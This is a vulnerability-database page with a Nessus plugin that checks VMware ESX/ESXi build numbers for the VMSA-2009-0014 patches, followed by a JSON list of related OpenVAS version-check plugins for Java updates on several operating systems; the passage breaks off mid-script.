ID VMWARE_VMSA-2009-0014_REMOTE.NASL Type nessus Reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc. Modified 2020-06-02T00:00:00
Description
The remote VMware ESX / ESXi host is missing a security-related patch.
It is, therefore, affected by multiple vulnerabilities, including
remote code execution vulnerabilities, in the following components :
ISC DHCP dhclient
Integrated Services Digital Network (ISDN) subsystem
Java Runtime Environment (JRE)
Java SE Development Kit (JDK)
Java SE Web Start
Linux kernel
Linux kernel 32-bit and 64-bit emulation
Linux kernel Simple Internet Transition INET6
Linux kernel tty
Linux kernel virtual file system (VFS)
Red Hat dhcpd init script for DHCP
SBNI WAN driver
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(89116);
script_version("1.5");
script_cvs_date("Date: 2018/08/06 14:03:16");
script_cve_id(
"CVE-2007-6063",
"CVE-2008-0598",
"CVE-2008-2086",
"CVE-2008-2136",
"CVE-2008-2812",
"CVE-2008-3275",
"CVE-2008-3525",
"CVE-2008-4210",
"CVE-2008-5339",
"CVE-2008-5340",
"CVE-2008-5341",
"CVE-2008-5342",
"CVE-2008-5343",
"CVE-2008-5344",
"CVE-2008-5345",
"CVE-2008-5346",
"CVE-2008-5347",
"CVE-2008-5348",
"CVE-2008-5349",
"CVE-2008-5350",
"CVE-2008-5351",
"CVE-2008-5352",
"CVE-2008-5353",
"CVE-2008-5354",
"CVE-2008-5355",
"CVE-2008-5356",
"CVE-2008-5357",
"CVE-2008-5358",
"CVE-2008-5359",
"CVE-2008-5360",
"CVE-2009-0692",
"CVE-2009-1093",
"CVE-2009-1094",
"CVE-2009-1095",
"CVE-2009-1096",
"CVE-2009-1097",
"CVE-2009-1098",
"CVE-2009-1099",
"CVE-2009-1100",
"CVE-2009-1101",
"CVE-2009-1102",
"CVE-2009-1103",
"CVE-2009-1104",
"CVE-2009-1105",
"CVE-2009-1106",
"CVE-2009-1107",
"CVE-2009-1893"
);
script_bugtraq_id(
26605,
29235,
29942,
30076,
30647,
31368,
32608,
32620,
32892,
34240,
35668,
35670
);
script_xref(name:"VMSA", value:"2009-0014");
script_name(english:"VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2009-0014) (remote check)");
script_summary(english:"Checks the ESX / ESXi version and build number.");
script_set_attribute(attribute:"synopsis", value:
"The remote host is missing a security-related patch.");
script_set_attribute(attribute:"description", value:
"The remote VMware ESX / ESXi host is missing a security-related patch.
It is, therefore, affected by multiple vulnerabilities, including
remote code execution vulnerabilities, in the following components :
- ISC DHCP dhclient
- Integrated Services Digital Network (ISDN) subsystem
- Java Runtime Environment (JRE)
- Java SE Development Kit (JDK)
- Java SE Web Start
- Linux kernel
- Linux kernel 32-bit and 64-bit emulation
- Linux kernel Simple Internet Transition INET6
- Linux kernel tty
- Linux kernel virtual file system (VFS)
- Red Hat dhcpd init script for DHCP
- SBNI WAN driver");
script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2009-0014");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the vendor advisory that
pertains to ESX / ESXi version 3.5 / 4.0.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Sun Java Calendar Deserialization Privilege Escalation');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_cwe_id(16, 20, 59, 94, 119, 189, 200, 264, 287, 399);
script_set_attribute(attribute:"vuln_publication_date", value:"2007/11/20");
script_set_attribute(attribute:"patch_publication_date", value:"2009/10/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esx");
script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esxi");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.");
script_dependencies("vmware_vsphere_detect.nbin");
script_require_keys("Host/VMware/version", "Host/VMware/release");
script_require_ports("Host/VMware/vsphere");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
app_name = "VMware ESX";
version = get_kb_item_or_exit("Host/VMware/version");
release = get_kb_item_or_exit("Host/VMware/release");
port = get_kb_item_or_exit("Host/VMware/vsphere");
fixes = make_array();
fixes["ESX 3.5"] = 199239;
fixes["ESX 4.0"] = 219382;
fixes["ESXi 4.0"] = 208167;
matches = eregmatch(pattern:'^VMware (ESXi?).*build-([0-9]+)$', string:release);
if (empty_or_null(matches))
exit(1, 'Failed to extract the ESX / ESXi build number.');
type = matches[1];
build = int(matches[2]);
fixed_build = fixes[version];
if (!isnull(fixed_build) && build < fixed_build)
{
padding = crap(data:" ", length:8 - strlen(type)); # Spacing alignment
report = '\n ' + type + ' version' + padding + ': ' + version +
'\n Installed build : ' + build +
'\n Fixed build : ' + fixed_build +
'\n';
security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);
}
else
audit(AUDIT_INST_VER_NOT_VULN, "VMware " + version + " build " + build);
{"openvas": [{"lastseen": "2019-12-06T16:46:56", "bulletinFamily": "scanner", "description": "The remote host is missing Java for Mac OS X 10.5 Update 4.", "modified": "2019-12-05T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:1361412562310102042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102042", "title": "Java for Mac OS X 10.5 Update 4", "type": "openvas", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 Update 4\n#\n# LSS-NVT-2010-031\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102042\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2009-1106\", \"CVE-2009-1107\", \"CVE-2008-5352\", \"CVE-2008-5356\", \"CVE-2008-5353\",\n \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5339\", \"CVE-2009-1104\", \"CVE-2008-5360\",\n \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2009-1103\", \"CVE-2008-5347\",\n \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2009-1100\",\n \"CVE-2009-1101\", \"CVE-2009-1099\", \"CVE-2009-1098\", \"CVE-2009-1097\", \"CVE-2009-1095\",\n \"CVE-2009-1096\", \"CVE-2009-1094\", \"CVE-2009-1093\", \"CVE-2008-5341\", \"CVE-2008-5359\",\n \"CVE-2008-5342\", \"CVE-2008-5340\", \"CVE-2008-2086\", \"CVE-2008-5343\", \"CVE-2009-1719\");\n script_name(\"Java for Mac OS X 10.5 Update 4\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.5\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT3632\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Java for Mac OS X 10.5 Update 4.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n Java\");\n\n script_tag(name:\"solution\", value:\"Update your Java for Mac OS X. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.5\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.7\",\"Mac OS X Server 10.5.7\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.7\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"4\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.7\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"4\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:56:13", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65907", "id": "OPENVAS:65907", "title": "SLES10: Security update for IBM Java 1.5.0", "type": "openvas", "sourceData": "#\n#VID slesp2-java-1_5_0-ibm-5960\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.5.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65907);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for IBM Java 1.5.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm\", rpm:\"java-1_5_0-ibm~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-alsa\", rpm:\"java-1_5_0-ibm-alsa~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-devel\", rpm:\"java-1_5_0-ibm-devel~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-fonts\", rpm:\"java-1_5_0-ibm-fonts~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-jdbc\", rpm:\"java-1_5_0-ibm-jdbc~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-plugin\", rpm:\"java-1_5_0-ibm-plugin~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:18", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65489", "id": "OPENVAS:65489", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65489);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:09:50", "bulletinFamily": "scanner", "description": "The remote host is missing Java for Mac OS X 10.5 Update 4.\n One or more of the following components are affected:\n\n Java", "modified": "2017-02-22T00:00:00", "published": "2010-05-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=102042", "id": "OPENVAS:102042", "title": "Java for Mac OS X 10.5 Update 4", "type": "openvas", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 Update 4\n#\n# LSS-NVT-2010-031\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Java for Mac OS X.\n\n For more information see:\n http://support.apple.com/kb/HT3632\";\n\ntag_summary = \"The remote host is missing Java for Mac OS X 10.5 Update 4.\n One or more of the following components are affected:\n\n Java\";\n\n\nif(description)\n{\n script_id(102042);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2009-1106\",\"CVE-2009-1107\",\"CVE-2008-5352\",\"CVE-2008-5356\",\"CVE-2008-5353\",\"CVE-2008-5354\",\"CVE-2008-5357\",\"CVE-2008-5339\",\"CVE-2009-1104\",\"CVE-2008-5360\",\"CVE-2008-5344\",\"CVE-2008-5345\",\"CVE-2008-5346\",\"CVE-2009-1103\",\"CVE-2008-5347\",\"CVE-2008-5348\",\"CVE-2008-5349\",\"CVE-2008-5350\",\"CVE-2008-5351\",\"CVE-2009-1100\",\"CVE-2009-1101\",\"CVE-2009-1099\",\"CVE-2009-1098\",\"CVE-2009-1097\",\"CVE-2009-1095\",\"CVE-2009-1096\",\"CVE-2009-1094\",\"CVE-2009-1093\",\"CVE-2008-5341\",\"CVE-2008-5359\",\"CVE-2008-5342\",\"CVE-2008-5340\",\"CVE-2008-2086\",\"CVE-2008-5343\",\"CVE-2009-1719\");\n script_name(\"Java for Mac OS X 10.5 Update 4\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.7\",\"Mac OS X Server 10.5.7\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.7\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"4\")) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.7\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"4\")) { security_message(0); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:44", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0016.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the Security Alerts from IBM.\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2018-04-06T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063190", "id": "OPENVAS:136141256231063190", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0016", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0016.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0016 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0016.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the Security Alerts from IBM.\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63190\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0016\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0016.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www-128.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.9~1jpp.4.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif 